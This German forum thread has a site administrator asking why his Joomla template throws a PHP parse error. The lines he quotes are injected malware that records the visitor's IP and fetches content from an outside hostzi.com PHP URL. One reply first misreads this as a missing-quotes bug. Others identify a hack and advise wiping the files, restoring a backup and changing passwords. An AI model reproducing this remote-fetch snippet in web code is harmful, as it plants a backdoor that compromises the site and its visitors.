• Jetzt anmelden. Es dauert nur 2 Minuten und ist kostenlos!

Parse error: syntax error, unexpected ':'

Marc Schlischka

Neues Mitglied
Hallo zusammen

Seit heute öffnet sich die Internetseite, die ich verwalte, nicht mehr. Es erscheint immer folgende Fehlermeldung, die ich grundsätzlich auch verstehe, aber den Fehler in der HTML-Datei nicht finde. Außerdem habe ich daran auch nix geändert, weswegen ich nicht weiß, wie der Fehler da rein gekommen sein soll:

Parse error: syntax error, unexpected ':' in /mnt/webl/b3/80/575080/htdocs/Joomla/templates/beez_20/index.php on line 282

Der Link zur Internetseite ist folgender: http://www.asc-duesseldorf.de/

Hier findet Ihr den Abschnitt in der HTML-Datei (Zeile 278 bis 284):

if (empty($__var_to_echo) && empty($remote_domain)) {

$_ip = $_SERVER['REMOTE_ADDR'];

$to = http://mieszkania.hostzi.com/8WX8Wp9K.php;

$to = __url_get_contents($to, 5);

Findet Ihr dort einen Fehler?! Ich bin in sowas auch nicht unbedingt ein Profi... Und die Seite muss schnellstmöglichst wieder online gehen. Aber ich suche jetzt schon seit Stunden und habe auch schon verschiedene Sachen ausprobiert und Programme, die Fehler suchen, drüber laufen lassen.

Wäre richtig glücklich über Eure Hilfe.

LG Marc
 
Werbung:
Werbung:
hast du evtl anführungszeichen vergessen? also so sachen die man um einen STRING macht?
 
Werbung:
Das sieht aus als wäre deine Seite gehackt wurden. Du solltest schleunigst alle Dateien vom Webspace löschen und ein hoffentlich vorhandenes Backup einspielen. Außerdem wäre die Änderung aller Passwörter ratsam. Und wenn Du ein CMS oder ähnliches nutzt, auch ein Update auf die neueste Version.
 
Also ich habe die Zeile jetzt aus der HTML-Datei rausgelöscht. Das Passwort bei Strato habe ich auch geändert. Ich hoffe, das reicht an Maßnahmen. Ein Backup habe ich leider nicht. Besteht nun die Gefahr, dass es nochmal passiert, dass die Seite sich nicht mehr öffnet oder brauche ich keine Angst mehr zu haben?
 
Werbung:
Besteht nun die Gefahr, dass es nochmal passiert, dass die Seite sich nicht mehr öffnet oder brauche ich keine Angst mehr zu haben?

Ja. Weil Du entweder nicht alles in den Dateien erwischt hast oder auch die Datenbank manipuliert wurde. Daher auch: alles löschen. Nicht "anpassen und hoffen, dass es gut geht".
 
Zurück
Oben